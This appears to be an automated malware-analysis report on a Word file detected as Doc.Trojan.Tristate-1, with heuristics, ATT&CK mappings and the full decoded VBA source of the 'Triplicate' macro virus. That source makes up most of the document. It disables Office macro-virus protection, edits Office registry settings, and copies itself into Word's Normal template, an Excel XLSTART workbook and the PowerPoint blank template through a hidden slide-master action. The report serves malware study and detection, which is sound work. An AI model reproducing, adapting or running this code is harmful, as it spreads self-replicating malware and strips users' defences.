Verdict: MALICIOUS (Risk Score: 322)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample contains VBA macros that attempt to disable macro virus protection and replicate their code to the Excel startup folder, indicating an attempt to establish persistence. The script also attempts to write to registry keys related to Excel startup settings. The embedded URL is likely part of the lure or a secondary payload delivery mechanism.
Heuristics (7)
- ClamAV: Doc.Trojan.Tristate-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Tristate-1
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched lines in script: `On Error Resume Next` / `Options.VirusProtection = False` / `Options.ConfirmConversions = False`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched lines in script: `nt.InsertLines 1, ad.Lines(1, ad.CountofLines)` / `Set xlApp = CreateObject("Excel.Application")` / `If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then`
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched lines in script: `If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then` / `Set WordObj = GetObject(, "Word.Application")` / `If WordObj = "" Then`
- VBA copies the workbook into the Excel XLSTART startup folder (high, OLE_VBA_XLSTART_PERSISTENCE): The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour. Matched lines in script: `Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, nt.Lines(1, nt.CountofLines)` / `Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."` / `Book1Obj.Close`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://www.yusmany.com (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9246 bytes |

SHA-256: dc8a1703fe090b4047c73221cce0a84a5352e174c04fcc86b2326907a78e4540
Detection: ClamAV Doc.Trojan.Tristate-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'<!--1nternal-->
'Triplicate v0.21 /1nternal
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
Set nt = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set TT = Templates(1).VBProject.VBComponents(1).CodeModule
Set ad = ActiveDocument.VBProject.VBComponents(1).CodeModule
If ad.Lines(1, 1) <> "'<!--1nternal-->" Then
ad.DeleteLines 1, ad.CountofLines
ad.InsertLines 1, TT.Lines(1, TT.CountofLines)
If ad.Lines(1, 1) <> "'<!--1nternal-->" Then
ad.InsertLines 1, nt.Lines(1, nt.CountofLines)
End If
End If
If nt.Lines(1, 1) <> "'<!--1nternal-->" Then
nt.DeleteLines 1, nt.CountofLines
nt.InsertLines 1, ad.Lines(1, ad.CountofLines)
Set xlApp = CreateObject("Excel.Application")
If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Check"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Whoa"
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, nt.Lines(1, nt.CountofLines)
Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
Book1Obj.Close
End If
xlApp.Quit
Set PPObj = CreateObject("PowerPoint.Application")
Set PBT = PPObj.Presentations.Open(Application.Path + "\..\Templates\Blank Presentation.pot", , , msoFalse)
For Each ModComponent In PBT.VBProject.VBComponents
If ModComponent.Name = "Triplicate" Then dontadd = True
Next
If dontadd <> True Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\8.0\New User Settings\PowerPoint\Options", "MacroVirusProtection") = ""
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
Set NewMod = PBT.VBProject.VBComponents.Add(1)
NewMod.Name = "Triplicate"
NewMod.CodeModule.InsertLines 1, nt.Lines(1, nt.CountofLines)
NewMod.CodeModule.ReplaceLine 118, "Sub actionhook(tristate)"
Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0, 0, PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)
With ShapetoWack
.Name = "Triplicate"
.ZOrder (1)
.Line.Visible = False
.Fill.Visible = False
.ActionSettings(1).Action = 8
.ActionSettings(1).Run = "actionhook"
End With
Set NewMod = Nothing
PBT.Save
End If
PBT.Close
PPObj.Quit
End If
If TT.Lines(1, 1) <> "'<!--1nternal-->" Then
TT.DeleteLines 1, TT.CountofLines
TT.InsertLines 1, nt.Lines(1, nt.CountofLines)
End If
End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
Set AW = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
Set TW = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then
Set WordObj = CreateObject("Word.Application")
WQuit = True
End If
Set nt = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule
WordObj.Options.SaveNormalPrompt = False
nt.InsertLines 1, "Public Sub DisableAV()" + Chr(13) + Chr(10) + TW.Lines(23, 3) + Chr(13) + Chr(10) + TW.Lines(38, 3) + Chr(13) + Chr(10) + "End Sub"
WordObj.Run "Normal.ThisDocument.DisableAV"
nt.DeleteLines 1, nt.CountofLines
nt.InsertLines 1, TW.Lines(1, TW.CountofLines)
Set nt = Nothing
If WQuit = True Then WordObj.Quit
Set PPObj = CreateObject("PowerPoint.Application")
Set PBT = PPObj.Presentations.Open(Application.Path + "\..\Templates\Blank Presentation.pot", , , msoFalse)
For Each ModComponent In PBT.VBProject.VBComponents
If ModComponent.Name = "Triplicate" Then dontadd = True
Next
If dontadd <> True Then
Set NewMod = PBT.VBProject.VBComponents.Add(1)
NewMod.Name = "Triplicate"
NewMod.CodeModule.InsertLines 1, TW.Lines(1, TW.CountofLines)
NewMod.CodeModule.ReplaceLine 118, "Sub actionhook(tristate)"
Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0, 0, PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)
With ShapetoWack
.Name = "Triplicate"
.ZOrder (1)
.Line.Visible = False
.Fill.Visible = False
.ActionSettings(1).Action = 8
.ActionSettings(1).Run = "actionhook"
End With
Set NewMod = Nothing
PBT.Save
End If
PBT.Close
PPObj.Quit
Set xlApp = CreateObject("Excel.Application")
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, TW.Lines(1, TW.CountofLines)
Book1Obj.SaveAs FileName:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
Book1Obj.Close
xlApp.Quit
End If
If AW.Lines(1, 1) <> "'<!--1nternal-->" Then
AW.InsertLines 1, TW.Lines(1, TW.CountofLines)
End If
End Sub
Private Sub actionhook(tristate)
On Error Resume Next
If Int(Rnd * 7) = 0 Then
Set Home = ActivePresentation
If UCase(Dir(Application.Path + "\Xlstart\Book1.")) <> UCase("BOOK1") Then
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then
Set WordObj = CreateObject("Word.Application")
WQuit = True
End If
Set nt = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule
WordObj.Options.SaveNormalPrompt = False
nt.InsertLines 1, "Public Sub DisableAV()" + Chr(13) + Chr(10) + Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(23, 3) + Chr(13) + Chr(10) + Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(38, 3) + Chr(13) + Chr(10) + "End Sub"
WordObj.Run "Normal.ThisDocument.DisableAV"
nt.DeleteLines 1, nt.CountofLines
nt.InsertLines 1, Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(1, Home.VBProject.VBComponents("Triplicate").CodeModule.CountofLines)
nt.ReplaceLine 118, "Private Sub actionhook(tristate)"
Set nt = Nothing
If WQuit = True Then WordObj.Quit
Set xlApp = CreateObject("Excel.Application")
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(1, Home.VBProject.VBComponents("Triplicate").CodeModule.CountofLines)
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.ReplaceLine 118, "Private Sub actionhook(tristate)"
Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
Book1Obj.Close
xlApp.Quit
Set PBT = Presentations.Open(Application.Path + "\..\Templates\Blank Presentation.pot", , , msoFalse)
dontadd = False
For Each ModComponent In PBT.VBProject.VBComponents
If ModComponent.Name = "Triplicate" Then dontadd = True
Next
If dontadd <> True Then
Set NewMod = PBT.VBProject.VBComponents.Add(1)
NewMod.Name = "Triplicate"
NewMod.CodeModule.InsertLines 1, Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(1, Home.VBProject.VBComponents("Triplicate").CodeModule.CountofLines)
Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0, 0, PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)
With ShapetoWack
.Name = "Triplicate"
.ZOrder (1)
.Line.Visible = False
.Fill.Visible = False
.ActionSettings(1).Action = 8
.ActionSettings(1).Run = "actionhook"
End With
PBT.Save
End If
PBT.Close
End If
End If
ActivePresentation.SlideShowWindow.View.Next
End Sub
```